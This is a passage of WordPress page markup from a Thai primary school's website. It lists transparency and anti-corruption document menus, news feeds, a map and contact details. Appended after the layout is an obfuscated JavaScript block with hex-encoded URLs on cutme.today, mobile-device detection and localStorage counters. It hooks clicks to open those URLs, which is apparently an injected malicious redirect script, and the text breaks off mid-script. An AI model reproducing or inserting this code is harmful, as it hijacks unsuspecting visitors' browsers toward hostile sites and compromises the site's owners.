style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 